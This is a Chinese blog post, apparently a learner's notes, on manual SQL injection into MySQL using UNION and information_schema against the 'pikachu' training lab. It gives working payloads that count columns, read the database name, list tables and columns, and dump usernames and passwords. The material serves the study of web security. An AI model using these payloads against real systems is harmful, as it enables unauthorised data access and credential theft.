SQL注入之——union以及information_schema手工注入

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量1.1k 收藏 3
点赞数 1
分类专栏: web渗透测试与代码审计 #+ SQL注入攻击 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43079958/article/details/105273264
版权

SQL注入之union以及information_schema手工注入

目录

union 注入

	union 操作符用于合并两个或多个 SQL 语句集合起来,得到联合的查询结果。

确认字段个数

	注:union 操作符一般与 order by 语句配合使用
	因为查询的字段不能超过主查询的字段,这个时候可以在 SQL 语句后面加 order by 进行排序,通过这个办法可以判断主查询的字段。
	例如 若a' order by 4#%之前都没有报错,则三个字段

使用union针对查出来的字段数做一个SQL语句拼接

例如a' union select database(),user(),version()#%

information_schema 注入

	information_schema (提纲)数据库是 MySQL 系统自带的数据库。
	其中保存着关于 MySQL服务器所维护的所有其他数据库的信息。通过 information_schema 注入,我们可以将整个数据库内容全部窃取出来

先通过之前的union先找出数据库的名称

输入 vince' union select database(),user(),3#%

得到数据库名

获取pikachu数据库的表名

	u' union select table_schema ,table_name,3 from information_schema.tables where table_schema='pikachu'#
	where table_schema='pikachu'
		指定数据库
		from information_schema.   tables为 information_schema数据库库中的table表
		table_schema ,table_name
		为table表中的两个字段
			table_schema
					存储了数据库名
					table_name
							存储了表名
								由此得到了表名

获取 pikachu 数据库的字段名

	k'union select table_name,column_name,3 from information_schema.columns where table_name='users'#%
			table_name='users'指定表名为users的表
			from information_schema.columns  为 information_schema数据库库中的columns表
			table_name,column_name
					table_name
						存储了表名
					column_name 
						存储了字段名
							得到了字段名

最后获取敏感字段值的内容 username uid 等

			输入:kobe'union select username ,password,3 from users#%
				对密码解密

小结

通过这次的了解,我认识到可以按照数据库 库-表-字段这个层次性进行一步步渗透 这是一个很好的思路

温柔小薛
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
mysql注入information_mysql手注入information_schema数据库详解
weixin_35659005的博客
02-03 415
一、作为一个半道出家的萌新,深知在二、MySQL知己知彼,百战不殆,要想玩好SQL注入必须了解1、库(database):MySQL图书馆:而在数据库中它是这样的:2、表(table):表可以理解为存在于库中的二级目录,接上例子:类似于图书馆里的的书架,一个书架就是一个表,书架上贴的分类标签就是表名。书架:而在数据库中是这样的:3、列(column):列是存在于表中的目录,一个表中存在一个或多个列...
分享一个简单的sql注入
09-09
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。接下来给大家分享一个简单的sql注入,一起看看吧
15分钟了解sql注入(一) union注入
贤鱼的博客
09-24 1850
union注入详细教程
sql注入——联合注入union select)
4pri1
05-22 1644
联合注入 Select * from users where id = 1; mysql> select * from t_unv where unv_id =1 union select 1,2,schema_name from information_schema.schemata; 这里的本来3的位置由schema_name替换,就是第二个图片中查询的所示。 这么写,就通过union select 把本来查询的东西拼接到了3的回显位置上。 mysql> select...
分析SQL手工注入一般步骤
三朝看客
07-18 1938
首先,判断环境,寻找注入点,判断数据库类型,我们在前面的课程讲过。 其次,根据注入参数类型,在脑海中重构SQL语句的原貌. 按参数类型主要分为下面三种: (1) ID=131 这类注入的参数是数字型,SQL语句原貌大致如下: Select * from 表名 where 字段=131 注入的参数为ID=49 And [查询条件],即是生成语句: Select * from 表名 where 字段...
SQL Server手工注入方式
good good study
01-04 5676
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 5472
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入和盲注。
SQL注入详解(第二章手工注入
m0_52051132的博客
09-17 2719
mysql中存在4个控制权限的表,分别为user表,db表,tables_priv表,columns_priv表,我当前的版本mysql 5.7.22。mysql权限表的验证过程为:先从user表中的Host,User,Password这3个字段中判断连接的ip、用户名、密码是否存在,存在则通过验证。通过身份认证后,进行权限分配,按照user,db,tables_priv,columns_priv的顺序进行验证。
sql注入手工注入示例详解
09-10
手工注入是指不依赖自动化工具,而是通过手动构造和尝试不同的SQL语句来探测和利用这种漏洞。本文将深入讲解如何进行手工SQL注入,以帮助读者理解和掌握这个过程。 首先,我们需要识别注入点,即用户输入能够影响到...
SQL注入思路详解
12-14
2. **报错注入(Error Based)**:利用错误信息泄露数据库信息,如MySQL的`information_schema.tables`。 3. **布尔盲注(Boolean Based Blind)**:通过改变查询的布尔结果来判断数据的真假。 4. **时间盲注(Time ...
php手工注入.doc
11-29
【PHP手工注入详解】 PHP手工注入是Web安全领域中一种常见的攻击手段,它利用网站程序在处理用户输入数据时的不安全操作,非法获取或篡改数据库中的信息。在这个例子中,攻击者通过向URL参数中添加特定的SQL查询...
mysql -- 手工注入
Nixawk
04-22 6459
------------------[index1.php源码]------------------ ID: ------------------[index2.php源码]------------------ $con = mysql_connect("localhost","root","fuckyou"); mysql_select_db("mytestdb"
SQL注入详解
热门推荐
行者AI
09-16 1万+
现在大多数系统都使用B/S架构,出于安全考虑需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往会出现安全隐患,为了更好的保护数据泄露或服务器安全,为了方便的安全测试,便编写此文。 1. SQL注入简介 SQL注入就是指Web应用程序对用户输入数据的合理性没有进行判断,前端传入后端的参数是攻击者可控制的,并且根据参数带入数据库查询,攻击者可以通过构造不同的SQL语句来对数据库进行任意查询。下面以PHP语句为例作为展示: query="SE
SQL 手工注入
枫梓林のBlog
04-25 1万+
SQL 手工注入 文章目录SQL 手工注入0x01 SQL注入概述0x02 SQL 注入原理1.基本概述2.单引号的作用3.SQL 注入流程4.SQL 注入的基本分类3.常见注入方式分类0x03 部署 sqli-labs 学习环境1.sqli-labs 简介2.部署sqli-labs 实验环境2.1 搭建LAMP 环境2.2 检查安装的状态和启动服务2.3 配置 mysq 数据库 root 用户密码2.4 安装 sqli-labs 教学环境2.5 创建快照0x04 安装 hackbar 插件0x05 SQL
Information_Schema注入
qq_45680080的博客
11-02 312
Information_Schema注入 information_schema简单介绍: 打开MySQL数据库——在第二行mysql>处输入show databases(查看在MySQL上的数据库)——在第二行mysql>输入use information_schema;——进入之后在第四行mysql>输入show tables(查看该数据库的表格)——在第三行mysql>...
mysql元数据
m0_57379855的博客
10-15 524
元数据元数据元数据获取方法show获取数据informaton schema获取数据例子查看库,表的基本信息获取指定数据库状态信息获取数据库连接信息获取数据库配置信息查询表的建表信息查询表的索引信息查询用户的权限信息查看binlog事件信息查看从库状态信息查看innodb引擎状态信息统计表的存储引擎统计表的类型信息统计表个数信息统计表的列名信息统计数据库的数据量的信息应用IS进拼接语句 元数据 MySQL中的元数据是用来反馈教据库实例的状志(例如:连接状态,运行状志等) 存储数据库对象定义信息(如图表,列、
information_schema注入
北冥有鱼
03-30 4958
上一篇文章提到过,information_schema是mysql自带的一个表,这个表里存放了大量信息。 我们可以进去这个数据库简单的看一下 然后输入 show tables, 能看到这里面有很多的表,我们先来看一下tables这个表 可以发现这里面有很多的字段,这些字段包含了这个数据库的名称,这个数据库里的表的名称,表的类型,默认的引擎,版本等等。。这些东西,都会放到这个表里面 还有一...
sql注入之——SQLMap常见语句
温柔小薛的博客
07-19 3737
填坑~~ SQLMap常见语句 首先要明确 整个的单词 需要用两个横杠– 缩写的单词 需要一个横杠- 参考:https://www.freebuf.com/sectool/164608.html 一、个人常用语句总结: 1、最常用URL注入语句 sqlmap.py -u http://192.168.0.102/sqlserver/1.aspx?xxser=1 –level=LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数
SQL注入学习之路:sqli-labs靶场实战解析
学习者会接触到`UNION SELECT`、`INFORMATION_SCHEMA`表的使用,以及如何利用注入进行数据库的深度探索。 sqli-labs靶场提供了一个逐步提升SQL注入技能的平台,通过这些关卡的练习,学习者可以系统地理解和掌握SQL...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值